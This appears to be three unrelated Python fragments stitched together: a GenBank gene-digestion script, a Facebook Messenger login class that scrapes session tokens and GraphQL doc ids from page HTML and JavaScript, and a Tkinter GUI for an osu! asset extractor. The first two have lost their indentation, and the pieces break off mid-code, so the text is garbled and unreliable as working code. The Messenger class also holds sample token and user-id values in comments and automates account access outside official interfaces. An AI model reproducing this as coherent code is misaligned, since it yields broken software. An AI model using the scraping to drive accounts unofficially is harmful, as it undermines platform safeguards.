    """Map the first 14 chars of each fasta record id (the refseq accession)
    to its sequence string."""
    return {record.id[:14]: str(record.seq) for record in SeqIO.parse(file_name, "fasta")}
def genelist_to_list(file_name):
    """Read a newline-separated gene list file into a list of non-empty lines."""
    with open(file_name,"r") as handle:
        contents = handle.read()
    return [entry for entry in contents.split("\n") if entry]
## ==================
## Ask for user input
## ==================
path = FreeGenes_configuration()["PROJECT_PATH"]
print("Please choose a genome file")
genome = file_list(path + "genome/genome_sequences/*.gb")
print("Please choose configuration file")
digest_configuration = file_list(path + "genome/digestion_configuration/*.yaml")
config = load_configuration(digest_configuration)
transl_table = ' /transl_table='+str(config["transl_table"])
## =====================================
## Check for protein files or gene lists
## =====================================
if config["protein_file"]:
protein_fasta = file_list(path + "genome/protein_lists/*.fasta")
protein_dictionary = fasta_refseq_dictionary(protein_fasta)
if config["gene_list"]:
essential_list = file_list(path + "genome/gene_lists/*.txt")
essential_list = genelist_to_list(essential_list)
## ========================
## Process Genbank into CSV
## ========================
df = genbank_to_csv(genome)
## ================
## Digest the table
## ================
for index, row in df.iterrows():
string = row["description"]
sequence = row["sequence"]
data = (dictionary_builder(important_tags, string))
references = (re.findall(r'(db_xref=\"[A-Za-z0-9:_/-_\s-]+\")',string))
data["references"] = references
# Genbank stuff
multiline = (genbank_multiline(dictionary_to_genbank(data)) + transl_table + "\n" + " /codon_start=1" + "\n" + genbank_multiline(references))
if not data["gene"] == "":
definition = data["gene"]
else:
definition = data["locus_tag"]
# Get gene_id and collection id
gene_id = NextID()
write = True
# Essential checker
if config["gene_list"]:
if data["gene"] in essential_list or data["locus_tag"] in essential_list:
write = True
else:
write = False
unused.add(definition)
# Protein file checker
if config["protein_file"]:
ref = data["protein_id"]
if ref:
write = True
data["translation"] = protein_dictionary[data["protein_id"]]
print("Changed translation on " + gene_id)
else:
write = False
# Setup database links
links = []
# Setup Genbank file prefix
genbank_file | |
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36""")
if homepage is None or homepage == "":
raise Exception("Get userid failed.")
self.homepage = homepage
# {"USER_ID":"100027859862248","ACCOUNT_ID":"100027859862248","NAME":"<NAME>","SHORT_NAME":"<NAME>","IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false}
succ, self._userid = helper_str.substringif(
homepage, 'USER_ID":"', '"')
if not succ or self._userid is None or self._userid == "":
raise Exception("Get userid failed")
if self._username is None or self._username == "":
succ, username = helper_str.substringif(
homepage, 'NAME":"', '')
if succ and not self._username is None and not self._username == "":
self._username = username
# "async_get_token":"Adz9YM4ErUVi1H0azTmDnBX6Md_LsWwifZoVLsZMMIUakA:<KEY>"}
succ, self.fb_dtsg_ag = helper_str.substringif(
homepage, 'async_get_token":"', '"')
if not succ or self.fb_dtsg_ag is None or self.fb_dtsg_ag == "":
raise Exception("fb_dtsg_ag not found")
# "__spin_r":4206568,
succ, self._spin_r = helper_str.substringif(
homepage, '__spin_r":', ',')
if not succ or self._spin_r is None or self._spin_r == "":
raise Exception("__spin_r not found. account may be locked")
# "__spin_r":4206568,"__spin_b":"trunk","__spin_t":1534242344,
succ, self._spin_t = helper_str.substringif(
homepage, '__spin_t":', ',')
if not succ or self._spin_t is None or self._spin_t == "":
raise Exception("__spin_t not found")
succ, self._spin_b = helper_str.substringif(
homepage, '__spin_b":', ',')
if not succ or self._spin_b is None or self._spin_b == "":
raise Exception("__spin_b not found")
self._spin_b = self._spin_b.strip().strip('"')
# "hsi":"6746747510353494316-0"
succ, self.hsi = helper_str.substringif(homepage, '"hsi":"', '"')
if not succ or self.hsi is None or self.hsi == "":
raise Exception("hsi not found")
# {"name":"fb_dtsg","value":"AQHRzELKyYTl:AQFKH4XWkHlv"}
succ, self.fb_dtsg = helper_str.substringif(homepage, '"name":"fb_dtsg","value":"', '"')
if not succ or self.fb_dtsg is None or self.fb_dtsg == "":
raise Exception("fb_dtsg not found")
# {"name":"jazoest","value":"22097"}
succ, self.jazoest = helper_str.substringif(
homepage, '"name":"jazoest","value":"', '"')
if not succ or self.jazoest is None or self.jazoest == "":
raise Exception("jazoest not found")
# 没有QuicklingConfig
# ,"pkg_cohort":"EXP2:comet_pkg","
succ, self._pc = helper_str.substringif(
homepage, '"pkg_cohort":"', '"')
if not succ or self._pc is None or self._pc == "":
raise Exception("_pc not found")
# "client_revision":1003006555,
succ, self._rev = helper_str.substringif(
homepage, '"client_revision":', ',')
if not succ or self._rev is None or self._rev == "":
raise Exception("_rev not found")
# 获取个人主页地址
html, redir = self._ha.getstring_unredirect('https://www.facebook.com/me',
headers="""
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: en-US,en;q=0.9
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36"""
)
if redir is None or redir == "":
raise Exception("进入个人主页失败")
self._host = redir
# 进入messenger页面(通过facebook的cookie进入,如果不是,url需要改)
# "deviceId":"39f79811-b3a7-447e-8483-7d2f59e35915","schemaVersion":"3696807697038235",
re_params = re.compile(r'"deviceId":"(.*?)","schemaVersion":"(.*?)",')
# {"epochId":"6754309714097997511"},5634]
re_epochid = re.compile(r'"epochId":"(.*?)"}')
# "fbid":"100054477585089","appID":219994525426954,
re_aid = re.compile(r'"fbid":".*?","appID":(.*?),')
# {"app_id":"772021112871879"}
re_appid = re.compile(r'\{"app_id":"(\d+)"\}')
url = 'https://www.facebook.com/messages'
html = self._ha.getstring(url, headers='''
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
''')
m = re.search(re_params, html)
if m is None:
raise Exception("进入messenger页面失败")
self.device_id = m.group(1)
self.schema_version = m.group(2)
# epoch_id
m = re.search(re_epochid, html)
if m is None:
raise Exception("epoch id not found")
self.epoch_id = m.group(1)
# aid
m = re.search(re_aid, html)
if m is None:
raise Exception('aid not found')
self.aid = m.group(1)
# app_id
m = re.search(re_appid, html)
if m is None:
raise Exception("app id not found")
self.appid = m.group(1)
# if 'lightspeed_web_initial_sync_v2' in html:
# re_respnse_js = re.compile(r'"lightspeed_web_initial_sync_v2":\{.*?"response":\[("function.*?),\s*"function.*?\]\}\}\}')
# m = re_respnse_js.search(html)
# if m is None:
# raise Exception("Get js function fail")
# js_func = m.group(1)
# if js_func is None or js_func == '':
# raise Exception("Get js function fail")
# res = self._parse_init_js(js_func)
# if not res:
# raise Exception("处理初始消息js失败")
succ = True
msg = "Refresh neccessary fields succeed."
except Exception:
self._logger.error(
"Refresh neccessary fields from homepage error, taskid:%s\nphone:%s\nex:%s"
% (self.task.taskid, self.phone, traceback.format_exc()))
succ = False
msg = "Refresh neccessary fields failed."
return (succ, msg)
def _access_profile(self) -> (bool, str):
"""access simple profile"""
try:
url = "https://www.facebook.com/"
html = self._ha.getstring(
url,
headers="""
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: en-US,en;q=0.9
cache-control: no-cache
content-type: application/x-www-form-urlencoded
pragma: no-cache
sec-fetch-mode: cors
sec-fetch-site: same-origin
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"""
)
if html is None or html == "":
raise Exception("Get profile page failed.")
# {"USER_ID":"100027859862248","ACCOUNT_ID":"100027859862248",
# "NAME":"<NAME>","SHORT_NAME":"<NAME>","IS_MESSENGER_ON
# LY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false}
succ, self._userid = helper_str.substringif(
html, 'USER_ID":"', '"')
if not succ or self._userid is None or self._userid == "":
succ, self._userid = helper_str.substringif(
html, 'user_id:"', '"')
if not succ or self._username is None or self._username == "":
msg = "访问个人信息失败"
return (succ, msg)
succ, self._username = helper_str.substringif(html, 'NAME":"', '"')
if not succ or self._username is None or self._username == "":
succ, self._username = helper_str.substringif(
html, 'name:"', '"')
if not succ or self._username is None or self._username == "":
msg = "访问个人信息失败"
return (succ, msg)
succ, self.is_messenger_only_user = helper_str.substringif(
html, 'IS_MESSENGER_ONLY_USER":', ',')
if succ and not self.is_messenger_only_user is None:
if self.is_messenger_only_user == "false":
self.is_messenger_only_user = False
else:
self.is_messenger_only_user = True
succ, self.is_deactived_allowed_on_messenger = helper_str.substringif(
html, 'IS_DEACTIVATED_ALLOWED_ON_MESSENGER":', ',')
if succ and not self.is_deactived_allowed_on_messenger is None:
if self.is_deactived_allowed_on_messenger == "false":
self.is_deactived_allowed_on_messenger = False
else:
self.is_deactived_allowed_on_messenger = True
succ = True
msg = "访问个人信息成功"
except Exception:
self._logger.error(
"Access profile error:%s" % traceback.format_exc())
succ = False
msg = "访问个人信息失败"
return (succ, msg)
def _get_js_resources(self) -> iter:
"""下载并迭代返回所有页面里的js资源,用于查找各种docid..."""
try:
with self._jspages_locker:
if self._jspages_listpage is None:
# 拿资源列表页面
url = (
'https://www.facebook.com/ajax/bootloader-endpoint/?' +
'modules=NotificationList.react%2CNotificationJewelL' +
'ist.react%2CNotificationAsyncWrapper%2CNotification' +
'Store%2CNotificationJewelController%2CMercuryJewel%' +
'2CMercuryThreadInformer%2CMessengerState.bs%2CMesse' +
'ngerGraphQLThreadlistFetcher.bs%2CMercuryServerRequ' +
'ests%2CMercuryJewelUnreadCount.bs&' + '__user=' +
parse.quote_plus(self._userid) + '&__a=1&' + '__req=' +
self._req.get_next() + '&__be=1&' +
'__pc=PHASED%3Aufi_home_page_pkg&dpr=1&' + '__rev=' +
parse.quote_plus(self._rev) + '&fb_dtsg_ag=' +
parse.quote_plus(self.fb_dtsg_ag) + '&jazoest=' +
self.jazoest + '&__spin_r=' + parse.quote_plus(
self._spin_r) + '&__spin_b=' + parse.quote_plus(
self._spin_b) + '&__spin_t=' +
parse.quote_plus(self._spin_t))
html = self._ha.getstring(
url,
headers="""
accept: */*
accept-encoding: gzip, deflate
accept-language: zh-CN,zh;q=0.9
referer: https://www.facebook.com/""")
if not isinstance(html, str) or html == "":
self._logger.error("Get docid js pages failed.")
return
self._jspages_listpage = html
if len(self._jspages_itemurls) < 1:
# 解析资源列表页面
matches = MessengerLogin.re_js_resoures.findall(html)
if matches is None or not any(matches):
raise Exception("Get js resources failed.")
for m in matches:
try:
if len(m) != 2:
continue
n = m[0]
u = m[1]
u = u.replace('\\', '')
if not self._jspages_itemurls.__contains__(n):
self._jspages_itemurls[n] = u
except Exception:
self._logger.trace(
"Get docid for contact parse item url error: {} {}"
.format(m, traceback.format_exc()))
self._logger.info(
"Got js resources list, {} count={}".format(
self.uname_str, len(self._jspages_itemurls)))
# fbcookie = self._ha._managedCookie.get_cookie_for_domain(
# "https://www.facebook.com/")
# self._ha._managedCookie.add_cookies(uridocid.netloc, fbcookie)
for jsurl in self._jspages_itemurls.items():
try:
if self._jspages.__contains__(jsurl[0]):
yield self._jspages[jsurl[0]]
else:
jspage = self._ha.getstring(
jsurl[1],
headers="""
Origin: https://www.facebook.com
Referer: https://www.facebook.com/""")
self._jspages[jsurl[0]] = (jsurl[1], jspage)
self._logger.debug("Got js resource: {} {}".format(
self.uname_str, jsurl[1]))
yield self._jspages[jsurl[0]]
except Exception:
self._logger.error(
"Download js resources error: {} {}".format(
self.uname_str, traceback.format_exc()))
except Exception:
self._logger.error("Get js resources error: {} {}".format(
self.uname_str, traceback.format_exc()))
#######################################
def _get_js_v1(self) -> iter:
try:
html = self._ha.getstring('https://www.facebook.com',
headers="""
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate
accept-language: en-US,en;q=0.9
cache-control: no-cache
content-type: application/x-www-form-urlencoded
pragma: no-cache
sec-fetch-mode: cors
sec-fetch-site: same-origin
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"""
)
# 先取script src直接能拿到部分
ehtml = etree.HTML(html)
src_list = ehtml.xpath('//script/@src')
self._logger.info(
"Got js resources list count={}".format(len(src_list)))
for jsurl in src_list:
if jsurl.startswith('https://'):
js = self._ha.getstring(jsurl, headers='''
Origin: https://www.facebook.com
Referer: https://www.facebook.com/
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36''')
yield js
except Exception:
self._logger.error(
"Get js src error: {}".format(traceback.format_exc()))
def _get_docid_init(self) -> bool:
""""""
if self.docid_init is not None:
return True
res: bool = False
try:
# LSGraphqlInitialSyncQuery
for js in self._get_js_v1():
try:
if helper_str.is_none_or_empty(js) or 'LSGraphqlInitialSyncQuery' not in js:
continue
m = MessengerLogin._re_docid_LSGraphqlInitialSyncQuery.search(js)
if m is not None:
m_docid = re.search(r'id:\s*?"(\d+)"', m.group(1))
if m_docid is not None:
self.docid_init = m_docid.group(1)
res = True
break
except Exception:
self._logger.debug(
"Parse init message docid error: {}".format(traceback.format_exc()))
except Exception:
self._logger.error(
"Get docid for init message error: {} {}".format(
self.uname_str, traceback.format_exc()))
return res
def _parse_init_js(self, js_func) -> iter:
"""处理初始消息js, 包含联系人、第一条发送消息等信息"""
res = False
try:
re_js_seq = re.search(r'return LS.seq\(\[(.*?)\]\)\}', js_func)
if re_js_seq is None:
self._logger.error('处理js代码失败')
req_js = re_js_seq.group(1)
re_js_sp = re.compile(r'_=>LS.sp\((.*?)\)')
m = re_js_sp.findall(req_js)
if m is None:
self._logger.error('处理js代码失败')
for js_one in m:
param_list = self._parse_js_one_v1(js_one)
dict_one = dict()
if param_list[0] == '"396"':
self.last_applied_cursor = param_list[4][1:-1]
# LSMailboxDeleteThenInsertThreadStoredProcedure
# 聊天通道
elif param_list[0] == '"130"':
dict_one['type'] = 'threads'
dict_one['thread_id'] = self.J(self._parse_n(param_list[8]))
self.messenger_thread_id.append(dict_one['thread_id'])
# function c(a) {
# if (b("bs_caml_int64").eq(a, b("MessagingThreadType.bs").group) || b("bs_caml_int64").eq(a, b("MessagingThreadType.bs").tincanGroupDisappearing))
# return !0;
| |
# Internal
import os
import subprocess
from sys import exit
from tkinter import *
from tkinter import filedialog
from tkinter import messagebox
import tkinter.ttk as ttk
import webbrowser
# User lib
from osu_extractor.GetData import getSubFolder, getAllItemsInFolder, getFolderName, extractFiles, createPathIfNotExist, keepCertainListByKeyword, getFileTypeListInFolder
from osu_extractor.Public import jsonHandler, version
# Local
dir_path = os.path.dirname(os.path.realpath(__file__))
def OpenUrl(url):
    """Open *url* in a new window/tab of the system default web browser."""
    webbrowser.open_new(url)
def startfile(filename, dontCreateIfNotExist=False):
    """
    Open a folder or file in the default application.

    Unless dontCreateIfNotExist is set, the path is created first. Falls
    back to ``xdg-open`` where ``os.startfile`` is unavailable (non-Windows);
    any failure is reported to the user via a message box.
    """
    def _show_missing():
        # Shared dialog for a path that could not be found.
        messagebox.showerror("Error", "Cannot find the file specified.")

    if not dontCreateIfNotExist:
        createPathIfNotExist(filename)
    try:
        os.startfile(filename)
    except FileNotFoundError:
        _show_missing()
    except Exception:
        # os.startfile exists only on Windows; try the Linux opener.
        try:
            subprocess.Popen(["xdg-open", filename])
        except FileNotFoundError:
            _show_missing()
        except Exception as e:
            messagebox.showerror("Error", str(e))
class CreateToolTip(object):
    """
    Attach a hover tooltip to a Tk widget.

    The tip appears *delay* milliseconds after the pointer enters the
    widget and is hidden again on leave or on any button press.
    """

    def __init__(self, widget, text="widget info", delay=250, wraplength=180, opacity=1.0, always_on_top=True):
        self.waittime = delay  # delay before showing, in milliseconds
        self.wraplength = wraplength  # label wrap width, in pixels
        self.widget = widget
        self.text = text
        self.opacity = opacity
        self.always_on_top = always_on_top
        for sequence, handler in (("<Enter>", self.enter),
                                  ("<Leave>", self.leave),
                                  ("<ButtonPress>", self.leave)):
            self.widget.bind(sequence, handler)
        self.id = None  # pending after() callback id, if any
        self.tw = None  # the Toplevel holding the tip while visible

    def enter(self, event=None):
        self.schedule()

    def leave(self, event=None):
        self.unschedule()
        self.hidetip()

    def schedule(self):
        # Restart the timer so a quick re-enter does not double-fire.
        self.unschedule()
        self.id = self.widget.after(self.waittime, self.showtip)

    def unschedule(self):
        pending, self.id = self.id, None
        if pending:
            self.widget.after_cancel(pending)

    def showtip(self, event=None):
        left, top, _cx, _cy = self.widget.bbox("insert")
        left += self.widget.winfo_rootx() + 25
        top += self.widget.winfo_rooty() + 20
        # A borderless, topmost, slightly transparent toplevel near the widget.
        self.tw = Toplevel(self.widget)
        self.tw.wm_attributes("-topmost", self.always_on_top)
        self.tw.wm_attributes("-alpha", self.opacity)
        self.tw.wm_overrideredirect(True)
        self.tw.wm_geometry("+%d+%d" % (left, top))
        label = Label(self.tw, text=self.text, justify="left", background="#ffffff", relief="solid", borderwidth=1, wraplength=self.wraplength)
        label.pack(ipadx=1)

    def hidetip(self):
        tip, self.tw = self.tw, None
        if tip:
            tip.destroy()
class Main:
    def __init__(self):
        """Build the whole GUI: main window, menu bar, settings frame,
        output table and progress bar. Loads (or creates) the JSON
        settings file before laying out the widgets that depend on it."""
        # Create the main window
        self.root = Tk()
        self.root.title("Osu! Extractor V" + version)
        self.root.geometry("900x600")
        self.root.protocol("WM_DELETE_WINDOW", self.on_Closing)
        # Create the menu
        self.menubar = Menu(self.root)
        self.file_menu = Menu(self.menubar, tearoff=0)
        self.file_menu.add_checkbutton(label="Always on Top", command=self.always_On_Top)
        self.file_menu.add_separator()
        self.file_menu.add_command(label="Exit Application", command=self.on_Closing)
        self.menubar.add_cascade(label="Options", menu=self.file_menu)
        self.file_menu2 = Menu(self.menubar, tearoff=0)
        self.file_menu2.add_command(label="Osu!.exe", command=lambda: self.openOsu())
        self.file_menu2.add_command(label="Osu! folder", command=lambda: startfile(self.config["osu_path"], True))
        # add output menu for each output type, nested
        self.output_menu = Menu(self.file_menu2, tearoff=0)
        self.output_menu.add_command(label="Song", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["song"], "song")))
        self.output_menu.add_command(label="Image", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["img"], "img")))
        self.output_menu.add_command(label="Video", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["video"], "video")))
        self.output_menu.add_command(label="Custom", command=lambda: startfile(self.getOutputPath(self.config["output_path"]["custom"], "custom")))
        self.file_menu2.add_cascade(label="Output", menu=self.output_menu)
        self.menubar.add_cascade(label="Open", menu=self.file_menu2)
        self.file_menu3 = Menu(self.menubar, tearoff=0)
        self.file_menu3.add_command(label="Tutorial", command=self.tutorial)
        self.file_menu3.add_command(label="About", command=self.about)
        self.file_menu3.add_separator()
        self.file_menu3.add_command(label="Open Repository", command=lambda aurl="https://github.com/Dadangdut33/Osu-Extractor": OpenUrl(aurl))
        self.menubar.add_cascade(label="Help", menu=self.file_menu3)
        self.root.config(menu=self.menubar)
        self.root.bind("<F1>", self.about)
        # First read the config file; fall back to (and persist) defaults.
        status, data = jsonHandler.loadSetting()
        if status == False: # No config file
            statusDefault, dataDefault = jsonHandler.setDefault()
            if statusDefault == False:
                # NOTE(review): this reports str(data) — the error from
                # loadSetting() — rather than str(dataDefault) from
                # setDefault(); confirm which message was intended.
                messagebox.showerror("Error", "Fail to create default setting file! Please check the folder permission. Error details " + str(data))
                exit(1)
            else:
                messagebox.showinfo("Info", "Settings file not found! Default setting file has been created and aplied!")
                self.config = jsonHandler.default_Setting
        else:
            self.config = data
        # Frames
        # 1 - settings frame, five stacked rows
        self.frame_1 = LabelFrame(self.root, text="Settings", padx=5, pady=5, font="TkDefaultFont 10 bold")
        self.frame_1.pack(side=TOP, fill=X, expand=False, padx=5, pady=5)
        self.frame_1_row_1 = Frame(self.frame_1)
        self.frame_1_row_1.pack(side=TOP, fill=X, expand=False)
        self.frame_1_row_2 = Frame(self.frame_1)
        self.frame_1_row_2.pack(side=TOP, fill=X, expand=False)
        self.frame_1_row_3 = Frame(self.frame_1)
        self.frame_1_row_3.pack(side=TOP, fill=X, expand=False)
        self.frame_1_row_4 = Frame(self.frame_1)
        self.frame_1_row_4.pack(side=TOP, fill=X, expand=False)
        self.frame_1_row_5 = Frame(self.frame_1)
        self.frame_1_row_5.pack(side=TOP, fill=X, expand=False)
        # 2 - output frame: counters, action buttons and the beatmap table
        self.frame_2 = LabelFrame(self.root, text="Output", padx=5, pady=5, font="TkDefaultFont 10 bold")
        self.frame_2.pack(side=TOP, fill=BOTH, expand=TRUE, padx=5, pady=5)
        self.frame_2_row_1 = Frame(self.frame_2)
        self.frame_2_row_1.pack(side=TOP, fill=X, expand=False)
        self.frame_2_row_2 = Frame(self.frame_2)
        self.frame_2_row_2.pack(side=TOP, fill=X, expand=False)
        self.frame_2_row_3 = Frame(self.frame_2) # TABLE
        self.frame_2_row_3.pack(side=TOP, fill=BOTH, expand=TRUE)
        # 3 - bottom frame holding the progress bar
        self.frame_3 = Frame(self.root)
        self.frame_3.pack(side=BOTTOM, fill=X, expand=False, padx=5, pady=5)
        self.frame_3_row_1 = Frame(self.frame_3)
        self.frame_3_row_1.pack(side=TOP, fill=X, expand=False)
        # Content
        # 1 - osu! path picker
        self.label_OsuPath = Label(self.frame_1_row_1, text="Osu! Path")
        self.label_OsuPath.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.label_OsuPath, "Osu game directory")
        self.entry_OsuPath = ttk.Entry(self.frame_1_row_1, width=50)
        self.entry_OsuPath.pack(side=LEFT, padx=5, pady=5, expand=True, fill=X)
        self.entry_OsuPath.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
        CreateToolTip(self.entry_OsuPath, "Osu game directory")
        self.browse_OsuPath = ttk.Button(self.frame_1_row_1, text="Browse", command=lambda: self.browseOsu())
        self.browse_OsuPath.pack(side=LEFT, padx=5, pady=5)
        # Extract-type checkboxes, each paired with its output-path entry
        # (right-click on an entry opens a directory chooser).
        self.varExtractSong = BooleanVar()
        self.varExtractSong.set(self.config["default_extract"]["song"])
        self.checkExtractSong = ttk.Checkbutton(self.frame_1_row_2, text="Extract Song (.mp3)", variable=self.varExtractSong)
        self.checkExtractSong.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.checkExtractSong, "Extract song to output folder")
        self.entryExtractSong = ttk.Entry(self.frame_1_row_2, width=16)
        self.entryExtractSong.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
        CreateToolTip(self.entryExtractSong, "Right Click to change output path of extracted song")
        self.entryExtractSong.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
        self.entryExtractSong.bind("<Button-3>", lambda event: self.browseOutputPath("song", self.entryExtractSong))
        self.varExtractImage = BooleanVar()
        self.varExtractImage.set(self.config["default_extract"]["img"])
        self.checkExtractImage = ttk.Checkbutton(self.frame_1_row_2, text="Extract Image (.jpg)", variable=self.varExtractImage)
        self.checkExtractImage.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.checkExtractImage, "Extract image to output folder")
        self.entryExtractImage = ttk.Entry(self.frame_1_row_2, width=15)
        self.entryExtractImage.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
        CreateToolTip(self.entryExtractImage, "Right Click to change output path of extracted image")
        self.entryExtractImage.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
        self.entryExtractImage.bind("<Button-3>", lambda event: self.browseOutputPath("img", self.entryExtractImage))
        self.varExtractVideo = BooleanVar()
        self.varExtractVideo.set(self.config["default_extract"]["video"])
        self.checkExtractVideo = ttk.Checkbutton(self.frame_1_row_3, text="Extract Video (.avi)", variable=self.varExtractVideo)
        self.checkExtractVideo.pack(side=LEFT, padx=(5, 11), pady=5)
        CreateToolTip(self.checkExtractVideo, "Extract video to output folder")
        self.entryExtractVideo = ttk.Entry(self.frame_1_row_3, width=12)
        self.entryExtractVideo.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
        self.entryExtractVideo.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
        CreateToolTip(self.entryExtractVideo, "Right Click to change output path of extracted video")
        self.entryExtractVideo.bind("<Button-3>", lambda event: self.browseOutputPath("video", self.entryExtractVideo))
        self.varExtractCustom = BooleanVar()
        self.varExtractCustom.set(self.config["default_extract"]["custom"])
        self.checkExtractCustom = ttk.Checkbutton(self.frame_1_row_3, text="Extract Custom", variable=self.varExtractCustom, command=lambda: self.toggleExtractCustom())
        self.checkExtractCustom.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.checkExtractCustom, "Extract custom lists provided to output folder")
        self.entryExtractCustom = ttk.Entry(self.frame_1_row_3, width=15)
        self.entryExtractCustom.pack(side=LEFT, padx=5, pady=5, fill=X, expand=True)
        self.entryExtractCustom.bind("<Key>", lambda event: self.allowedKey(event)) # Disable input
        CreateToolTip(self.entryExtractCustom, "Right Click to change output path of extracted custom list")
        # Custom list entry
        self.label_CustomList = Label(self.frame_1_row_4, text="Custom List")
        self.label_CustomList.pack(side=LEFT, padx=(5, 3), pady=5)
        CreateToolTip(self.label_CustomList, "Custom file type extract. Input the file format with dot and separated by space, ex: .png .wav")
        self.entry_CustomList = ttk.Entry(self.frame_1_row_4, width=30)
        self.entry_CustomList.pack(side=LEFT, padx=(0, 5), pady=5, fill=X, expand=True)
        CreateToolTip(self.entry_CustomList, "Custom file type extract. Input the file format with dot and separated by space, ex: .png .wav")
        # Save, cancel, set default btn
        self.btn_Save = ttk.Button(self.frame_1_row_5, text="Save", command=lambda: self.saveConfig())
        self.btn_Save.pack(side=RIGHT, padx=5, pady=5)
        CreateToolTip(self.btn_Save, "Save current settings so they can be loaded next time")
        self.btn_Cancel = ttk.Button(self.frame_1_row_5, text="Cancel", command=lambda: self.cancelConfig())
        self.btn_Cancel.pack(side=RIGHT, padx=5, pady=5)
        CreateToolTip(self.btn_Cancel, "Cancel any changes and reset to currently saved settings")
        self.btn_SetDefault = ttk.Button(self.frame_1_row_5, text="Set Default", command=lambda: self.setDefaultConfig())
        self.btn_SetDefault.pack(side=RIGHT, padx=5, pady=5)
        CreateToolTip(self.btn_SetDefault, "Reset to default settings")
        # Push the loaded config values into the widgets above.
        self.initConfig()
        # 2
        # Label for map count
        self.label_MapCount = Label(self.frame_2_row_1, text="Beatmaps loaded: 0")
        self.label_MapCount.pack(side=LEFT, padx=5, pady=5)
        # label processed
        self.label_Processed = Label(self.frame_2_row_1, text="Processed: 0/0")
        self.label_Processed.pack(side=LEFT, padx=5, pady=5)
        # entry for filter
        # filter label
        self.label_Filter = Label(self.frame_2_row_2, text="Filter:")
        self.label_Filter.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.label_Filter, "Filter beatmaps by folder/beatmap name")
        self.varEntryFilter = StringVar()
        self.entry_Filter = ttk.Entry(self.frame_2_row_2, textvariable=self.varEntryFilter, width=30)
        self.entry_Filter.pack(side=LEFT, padx=(0, 5), pady=5, fill=X, expand=False)
        CreateToolTip(self.entry_Filter, "Filter beatmaps by folder/beatmap name")
        # Btn
        # Load, extract all, extract selected, clear all, clear selected
        self.btn_Load = ttk.Button(self.frame_2_row_2, text="Load Maps", command=lambda: self.loadMaps())
        self.btn_Load.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.btn_Load, "Load beatmaps data into table")
        self.btn_ExtractAll = ttk.Button(self.frame_2_row_2, text="Extract All", command=lambda: self.extractAll())
        self.btn_ExtractAll.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.btn_ExtractAll, "Extract all loaded beatmaps")
        self.btn_ExtractSelected = ttk.Button(self.frame_2_row_2, text="Extract Selected", command=lambda: self.extractSelected())
        self.btn_ExtractSelected.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.btn_ExtractSelected, "Extract currently selected beatmaps")
        self.btn_ClearAll = ttk.Button(self.frame_2_row_2, text="Clear All", command=lambda: self.clearAll())
        self.btn_ClearAll.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.btn_ClearAll, "Clear table")
        self.btn_ClearSelected = ttk.Button(self.frame_2_row_2, text="Clear Selected", command=lambda: self.clearSelected())
        self.btn_ClearSelected.pack(side=LEFT, padx=5, pady=5)
        CreateToolTip(self.btn_ClearSelected, "Delete currently selected beatmaps from the table")
        self.btn_CancelExtract = ttk.Button(self.frame_2_row_2, text="Cancel/Stop Extract", command=lambda: self.cancelExtract())
        self.btn_CancelExtract.pack(side=LEFT, padx=5, pady=5)
        # Table for map list
        self.scrollbarY = Scrollbar(self.frame_2_row_3, orient=VERTICAL)
        self.scrollbarY.pack(side=RIGHT, fill=Y)
        # self.scrollbarX = Scrollbar(self.frame_2_row_3, orient=HORIZONTAL)
        # self.scrollbarX.pack(side=BOTTOM, fill=X)
        self.table_MapList = ttk.Treeview(self.frame_2_row_3, height=10, selectmode="extended", columns=("#", "Name", "Path"))
